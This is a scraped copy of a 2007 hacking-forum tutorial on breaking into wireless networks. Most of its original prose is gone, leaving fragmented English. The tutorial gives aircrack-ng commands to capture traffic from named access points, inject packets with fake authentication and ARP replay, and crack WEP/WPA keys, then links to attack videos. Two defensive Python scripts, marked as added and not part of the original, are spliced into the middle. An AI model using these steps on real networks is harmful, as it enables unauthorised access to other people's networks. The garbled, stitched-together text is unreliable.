howto-hacking wireless networks (hacking wireless networks ,, wireless)

Upload: tar3q

Post on 30-May-2018


TRANSCRIPT

  • 8/14/2019 HOWTO-Hacking Wireless Networks ,,

    1/33

http://www.t0010.com

    ProXy-BrokeN####################### Br0ken r0x######################

    # Lesson : Howto Hacking Wireless Networks step by step ##Author: BrokeN-ProXy ## Page: www.3asfh.net &www.sniper-sa.com ## Contact Me 0nly email: [email protected] ##Msn Messenger : [email protected] ######################## r0x just do it ############### #####

Hacking Wireless Networks

    Copyright #~ BrokeN-ProXy #~ 2007


    http://www.3asfh.net/vb/

    http://www.sniper-sa.com/forums/

T0010.COM
http://www.t0010.com/books/index.php

--------------------------------------------------------------
aLT3rEQ$Hacker
---------------------------------------------------------------

Adobe Reader:
http://www.adobe.com/uk/products/acrobat/readstep2.html


WARNING
WLAN
Wired Equivalent Privacy
Wi-Fi Protected Access
aircrack-ng
wireless tools
[ Monitor Mode ]
The attack method 1
The attack method 2


Hacking Wireless

WARNING


WLAN

WLAN (wireless local area network); radio frequency (RF)


wireless computer cards

PCMCIA

USB


access point


Institute of Electrical and Electronics Engineers (IEEE)
Internet Engineering Task Force (IETF)
Wireless Ethernet Compatibility Alliance (WECA)
International Telecommunication Union (ITU)

IEEE


(WWAN)

WWAN

WWAN (2G): Global System for Mobile Communications (GSM), Cellular Digital Packet Data (CDPD), Code Division Multiple Access (CDMA).

ITU.

(WMAN) Wireless metropolitan area networks

WMAN


WMAN: multichannel multipoint distribution service (MMDS), local multipoint distribution services (LMDS)

IEEE 802.16.

(WLAN)

WLAN, LAN

1997, IEEE, WLAN; b; a


(WPAN) Wireless personal area networks

WPAN: PDA

(POS)

WPAN: Bluetooth

Bluetooth Special Interest Group (SIG)

Bluetooth

WPAN: IEEE; Bluetooth 1.0.

http://www.arabhardware.net/forum/showthread.php?t=27438&highlight=WLAN


WEP, WPA

Wired Equivalent Privacy

IEEE

Wired Equivalent Privacy (WEP)

WEP: RC4

64 bit

[Initialization Vector] IV; RC4; or 128 bit; IV

RC4 IV

RC4 IV; WEP header; WEP, WPA


Wi-Fi Protected Access

WEP

WPA (Wi-Fi Protected Access)

WPA with RADIUS

WPA with PSK [pre shared key]

Hexadecimal

TKIP (Temporal Key Integrity Protocol); WEP IV

Message Integrity Code; ARP

Replay Attack; WEP IV

IV

WPA Deauthentication Attack

brute force attack
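The document names the deauthentication attack against WPA but, in this copy, says nothing about how the owner of a network would notice one. The following Python is an added example, not part of the original document: it decodes the IEEE 802.11 MAC header and raises an alert when a single transmitter sends a threshold number of deauthentication or disassociation frames within a one-second window, which is the rate rule a basic wireless IDS applies. The sample frames are constructed for the example; the transmitter address reuses the access-point MAC from the document's airodump-ng command, and the window size and threshold are assumed values.

```python
from collections import defaultdict, deque

# Frame-control type/subtype values from the IEEE 802.11 standard.
MGMT_TYPE = 0
SUBTYPE_BEACON = 8
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12

# Constructed sample frames for this example. The transmitter address is the
# access-point MAC used in the document's airodump-ng command (00:14:7F:1F:27:6D).
DEAUTH_FRAME = bytes.fromhex(
    "c000" "3a01"          # frame control (mgmt/deauth), duration
    "ffffffffffff"         # addr1: receiver (broadcast)
    "00147f1f276d"         # addr2: transmitter
    "00147f1f276d"         # addr3: BSSID
    "0000"                 # sequence control
    "0700"                 # reason code 7, little-endian
)
BEACON_FRAME = bytes.fromhex(
    "8000" "0000" "ffffffffffff" "00147f1f276d" "00147f1f276d" "0000"
)


def parse_mgmt_header(frame: bytes) -> dict:
    """Decode the 24-byte 802.11 MAC header; reject frames that are too short."""
    if len(frame) < 24:
        raise ValueError("frame shorter than the 802.11 MAC header")
    fc = frame[0]                      # first frame-control byte
    ftype = (fc >> 2) & 0x3            # bits 2-3: type
    subtype = (fc >> 4) & 0xF          # bits 4-7: subtype

    def mac(offset: int) -> str:
        return ":".join(f"{b:02x}" for b in frame[offset:offset + 6])

    return {"type": ftype, "subtype": subtype,
            "addr1": mac(4), "addr2": mac(10), "addr3": mac(16)}


def is_deauth_or_disassoc(hdr: dict) -> bool:
    return hdr["type"] == MGMT_TYPE and hdr["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC)


def detect_deauth_flood(capture, window_s: float = 1.0, threshold: int = 20) -> list:
    """Sliding-window rate check per transmitter address.

    capture: iterable of (timestamp_seconds, raw_frame_bytes), in time order.
    Returns one alert per transmitter the first time its deauth/disassoc count
    inside a window_s-second window reaches threshold (assumed values).
    """
    recent = defaultdict(deque)        # transmitter -> timestamps of recent frames
    alerted = set()
    alerts = []
    for ts, frame in capture:
        try:
            hdr = parse_mgmt_header(frame)
        except ValueError:
            continue                   # truncated frame: ignore, do not crash
        if not is_deauth_or_disassoc(hdr):
            continue
        q = recent[hdr["addr2"]]
        q.append(ts)
        while q and ts - q[0] > window_s:
            q.popleft()
        if len(q) >= threshold and hdr["addr2"] not in alerted:
            alerted.add(hdr["addr2"])
            alerts.append({"transmitter": hdr["addr2"], "bssid": hdr["addr3"],
                           "count": len(q), "at": ts})
    return alerts


def constructed_capture(deauth_count: int, interval_s: float = 0.01) -> list:
    """Constructed monitor-mode capture: normal beacons plus a burst of deauths."""
    frames = [(i * 0.1, BEACON_FRAME) for i in range(10)]
    frames += [(i * interval_s, DEAUTH_FRAME) for i in range(deauth_count)]
    frames.sort(key=lambda entry: entry[0])
    return frames


if __name__ == "__main__":
    for alert in detect_deauth_flood(constructed_capture(60)):
        print(f"deauth flood from {alert['transmitter']} on BSSID {alert['bssid']}: "
              f"{alert['count']} frames by t={alert['at']:.2f}s")
```

In practice the frames come from a monitor-mode capture of the kind the document produces with airmon-ng and airodump-ng; here the capture is constructed so the block runs offline. The threshold trades false positives from a legitimately rebooting access point against detection delay, so it should be tuned per site.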


Aircrack Tools / Aircrack-ng Tools

Aircrack

NETGEAR or Linksys

[Chipset]

Atheros

www.aircrack-ng.org

The best chipset nowadays is Atheros. It is very well supported under Linux, and also under Windows (PCMCIA/CardBus only). Neither support any USB wireless devices. The latest madwifi-ng patch makes it possible to inject raw 802.11 packets in either Managed or Monitor mode at arbitrary b/g speeds.

aircrack tools

aircrack-ng tools


Chipset support for airodump and aireplay:

Chipset | Supported by airodump for Windows | Supported by airodump for Linux | Supported by aireplay for Linux
Atheros | CardBus: YES; PCI: NO (see CommView) | YES | YES (driver patching required)
Atmel | UNTESTED | 802.11b YES; 802.11g UNTESTED | UNTESTED
Broadcom | Old models only (BRCM driver) | YES | IN PROGRESS (Forum thread)
Centrino b | NO | PARTIAL (ipw2100 driver doesn't discard corrupted packets) | NO
Centrino b/g | NO | YES | NO (firmware drops most packets; ipw2200inject)
Centrino a/b/g | NO | YES | NO (See this thread for alpha injection support.)
Cisco Aironet | YES? | YES | NO (firmware issue)
Hermes I | YES | YES | NO (firmware corrupts the MAC header)
NdisWrapper | N/A | Never | Never
Prism2/3 | NO | YES | YES (PCI and CardBus only, driver patching required)
PrismGT | YES | FullMAC: YES; SoftMAC: NOT YET | YES (driver patching recommended)
Ralink | NO | YES (rt2500 / rt2570 / rt61 / rt73 driver) | YES, see rt2500, rt2570, rt61 and rt73. Also see Ralink chipset comments later on this page for important concerns
RTL8180 | YES | YES | UNSTABLE (driver patching required)
RTL8187L | UNTESTED | YES (driver patching required to view power levels) | YES (driver patching recommended for injection and required to view power levels)
TI (ACX100/ACX111) | NO | YES | YES (driver patching required)
ZyDAS 1201 | NO | YES | Partially (See patch for details)
ZyDAS 1211[B] | NO | YES | YES
Others (Marvel...) | NO | UNKNOWN | NO


kernel headers, gcc

Debian

Ubuntu, Xubuntu, Knoppix:

sudo apt-get install build-essential

wget http://download.aircrack-ng.org/aircrack-ng-0.9.1.tar.gz
tar -zxvf aircrack-ng-0.9.1.tar.gz
cd aircrack-ng-0.9.1
make
make install

Aircrack


wget http://pcmcia-cs.sourceforge.net/ftp/contrib/wireless_tools.28.tar.gz
tar xvfz wireless_tools.28.tar.gz
cd wireless_tools.28
make
make install

iwconfig, iwlist

wireless tools


iwlist (wireless tools)

scan all networks around:

bt ~ # iwlist ath0 scan
ath0      Scan completed :
          Cell 01 - Address: 00:14:7F:1F:27:6D
                    ESSID:"SpeedTouch433793"
                    Mode:Master
                    Frequency:2.462 GHz (Channel 11)
                    Quality=60/94  Signal level=-35 dBm  Noise level=-95 dBm
                    Encryption key:on
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
                              24 Mb/s; 36 Mb/s; 54 Mb/s; 6 Mb/s; 9 Mb/s
                              12 Mb/s; 48 Mb/s
                    Extra:bcn_int=100
                    Extra:wme_ie=dd180050f2020101880003a4000027a4000042435e0062322f00
          Cell 02 - Address: 00:18:39:24:5C:F8
                    ESSID:"linksys"
                    Mode:Master
                    Frequency:2.427 GHz (Channel 4)
                    Quality=50/94  Signal level=-45 dBm  Noise level=-95 dBm
                    Encryption key:off
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
                              48 Mb/s; 54 Mb/s
                    Extra:bcn_int=100
                    Extra:wme_ie=dd180050f2020101030003a4000027a4000042435e0062322f00
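Parsing this kind of `iwlist` listing is the basis of a routine site survey: a defender walks the premises and records which access points answer, which of them are unencrypted, and which BSSIDs are not in the approved inventory (a candidate rogue access point). The following Python is an added example, not from the original document; its sample input is the document's own scan output above, and the list of authorized BSSIDs is an assumed value.

```python
import re

# Sample input: the "iwlist ath0 scan" listing reproduced in the document.
SAMPLE_SCAN = """\
ath0      Scan completed :
          Cell 01 - Address: 00:14:7F:1F:27:6D
                    ESSID:"SpeedTouch433793"
                    Mode:Master
                    Frequency:2.462 GHz (Channel 11)
                    Quality=60/94  Signal level=-35 dBm  Noise level=-95 dBm
                    Encryption key:on
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s
                    Extra:bcn_int=100
          Cell 02 - Address: 00:18:39:24:5C:F8
                    ESSID:"linksys"
                    Mode:Master
                    Frequency:2.427 GHz (Channel 4)
                    Quality=50/94  Signal level=-45 dBm  Noise level=-95 dBm
                    Encryption key:off
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                    Extra:bcn_int=100
"""

CELL_RE = re.compile(r"Cell\s+(\d+)\s+-\s+Address:\s*([0-9A-Fa-f:]{17})")
ESSID_RE = re.compile(r'ESSID:"([^"]*)"')
CHANNEL_RE = re.compile(r"\(Channel\s+(\d+)\)")
SIGNAL_RE = re.compile(r"Signal level=(-?\d+)\s*dBm")
ENC_RE = re.compile(r"Encryption key:(on|off)")


def parse_iwlist_scan(text: str) -> list:
    """Turn `iwlist <iface> scan` output into one dict per cell."""
    cells = []
    cur = None
    for line in text.splitlines():
        m = CELL_RE.search(line)
        if m:
            cur = {"cell": int(m.group(1)), "address": m.group(2).upper(),
                   "essid": None, "channel": None, "signal_dbm": None,
                   "encrypted": None}
            cells.append(cur)
            continue
        if cur is None:
            continue                    # header text before the first cell
        m = ESSID_RE.search(line)
        if m:
            cur["essid"] = m.group(1)
        m = CHANNEL_RE.search(line)
        if m:
            cur["channel"] = int(m.group(1))
        m = SIGNAL_RE.search(line)
        if m:
            cur["signal_dbm"] = int(m.group(1))
        m = ENC_RE.search(line)
        if m:
            cur["encrypted"] = m.group(1) == "on"
    return cells


def open_networks(cells: list) -> list:
    """Cells that advertise no encryption at all."""
    return [c for c in cells if c["encrypted"] is False]


def unknown_aps(cells: list, authorized_bssids) -> list:
    """Cells whose BSSID is not in the authorized inventory (possible rogue AP)."""
    allowed = {b.upper() for b in authorized_bssids}
    return [c for c in cells if c["address"] not in allowed]


if __name__ == "__main__":
    # Assumed inventory for the example: only the SpeedTouch AP is ours.
    AUTHORIZED = ["00:14:7F:1F:27:6D"]
    found = parse_iwlist_scan(SAMPLE_SCAN)
    for c in found:
        print(f"{c['address']}  ch{c['channel']:>2}  {c['signal_dbm']} dBm  "
              f"{'enc' if c['encrypted'] else 'OPEN'}  {c['essid']}")
    print("open:", [c["essid"] for c in open_networks(found)])
    print("not in inventory:", [c["essid"] for c in unknown_aps(found, AUTHORIZED)])
```

One caveat: in this older `iwlist` output, "Encryption key:on" only reflects the privacy bit in the beacon; it does not say whether the network uses WEP or WPA, so an access point flagged as encrypted still needs a closer look (the WEP weaknesses the document goes on to describe apply regardless of that flag).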


Aircrack: Monitor

sniffing; Monitor mode; Managed

Monitor Mode:

command line; airmon-ng (Aircrack)

Managed:

bt ~ # iwconfig ath0
ath0      IEEE 802.11b  ESSID:""  Nickname:""
          Mode:Managed  Channel:0  Access Point: Not-Associated
          Bit Rate:0 kb/s   Tx-Power:31 dBm   Sensitivity=0/3
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/94  Signal level=-98 dBm  Noise level=-98 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Monitor Mode:

command line

bt ~ # ifconfig ath0 down
bt ~ # wlanconfig ath0 destroy
bt ~ # wlanconfig ath0 create wlandev wifi0 wlanmode monitor
ath0
bt ~ # ifconfig ath0 up
bt ~ # iwconfig ath0
ath0      IEEE 802.11b  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.412 GHz  Access Point: 00:0F:B5:EA:2F:AF     [ Monitor Mode ]
          Bit Rate:0 kb/s   Tx-Power:31 dBm   Sensitivity=0/3
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/94  Signal level=-98 dBm  Noise level=-98 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

airmon-ng (Aircrack):

bt ~ # airmon-ng stop ath0

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
eth0            Centrino b/g    ipw2200
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

bt ~ # airmon-ng start wifi0

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
eth0            Centrino b/g    ipw2200
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

bt ~ # iwconfig ath0
ath0      IEEE 802.11g  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.457 GHz  Access Point: Not-Associated
          Bit Rate:0 kb/s   Tx-Power:31 dBm   Sensitivity=0/3
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/94  Signal level=-94 dBm  Noise level=-94 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0


Monitor

interactive

arp request; ivs; 64 bit; 128 bit

The attack method 1


airodump-ng : capture packets
aireplay-ng --interactive : attack mode [packet injection]
aircrack-ng : crack WEP, WPA

(1) airodump-ng

airodump-ng -c 11 --bssid 00:14:7F:1F:27:6D -w capture ath0

-c : channel number
--bssid : MAC address of the access point
-w : save the capture file
capture : file name the packets are saved to
ath0 : our interface name


(2) aireplay-ng --interactive

aireplay-ng --interactive -b 00:14:7F:1F:27:6D -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -p 0841 -h 00:13:CE:6D:61:59 ath0

--interactive : attack mode
-b : MAC address of the access point
-d : destination MAC (broadcast)
-m 68 : minimum packet length
-n 68 : maximum packet length
-p 0841 : sets the frame control word
-h : MAC address of the client
ath0 : our interface name


(3) increase the packets

(4) aircrack-ng

aircrack-ng -b 00:14:7F:1F:27:6D capture.cap

-b : MAC address of the access point
capture.cap : capture file


Fake authentication

arp request; arp replay

The attack method 2


airmon-ng : switch to monitor mode
airodump-ng : capture packets
aireplay-ng : attack mode fake authentication
aireplay-ng : attack mode arpreplay
aircrack-ng : crack WEP, WPA

(1) airodump-ng

airodump-ng -c 6 --bssid 00:14:6C:1A:98:8C -w output ath0

-c : channel number
--bssid : MAC address of the access point
-w : save the capture file
output : file name the packets are saved to
ath0 : our interface name


(2) aireplay-ng fake authentication

aireplay-ng --fakeauth 6000 -o 1 -q 10 -e DataCenter -a 00:14:6C:1A:98:8C -h 00-0F-B5-EA-2F-AF ath0

--fakeauth : attack mode
-o 1 : send only one set of packets at a time
-q 10 : send keep-alive packets every 10 seconds
-e : name (ESSID) of the access point
-a : MAC address of the access point
-h : MAC address of our card
ath0 : our interface name


(3) aireplay-ng arpreplay

arp request

aireplay-ng --arpreplay -b 00:14:6C:1A:98:8C -h 00-0F-B5-EA-2F-AF ath0

--arpreplay : attack mode
-b : MAC address of the access point
-h : MAC address of our card
ath0 : our interface name


(3) increase the packets


(4) aircrack-ng

aircrack-ng -b 00:14:6C:1A:98:8C output.cap

-b : MAC address of the access point
output.cap : capture file


Attack-method 1 ( 124 MB )
http://www.4shared.com/file/24526019/8831b5f1/attack-method1part1.html?dirPwdVerified=630ebe35 50MB
http://www.4shared.com/file/24546586/40c72462/attack-method1part2.html?dirPwdVerified=630ebe35 50MB
http://www.4shared.com/file/24548769/ada0b720/attack-method1part3.html?dirPwdVerified=630ebe35 24MB

Attack-method 2 ( 113 MB )
http://www.4shared.com/file/24553904/65b4efa0/attack-method2part1.html?dirPwdVerified=24884433 50MB
http://www.4shared.com/file/24590482/9b931121/attack-method2part2.html?dirPwdVerified=24884433 50MB
http://www.4shared.com/file/24592271/2b86e86d/attack-method2part3.html?dirPwdVerified=24884433 13MB

(September 23, 2007)

----------------------------------------------------------------
aLT3rEQ$Hacker
------------------------------------------------------------------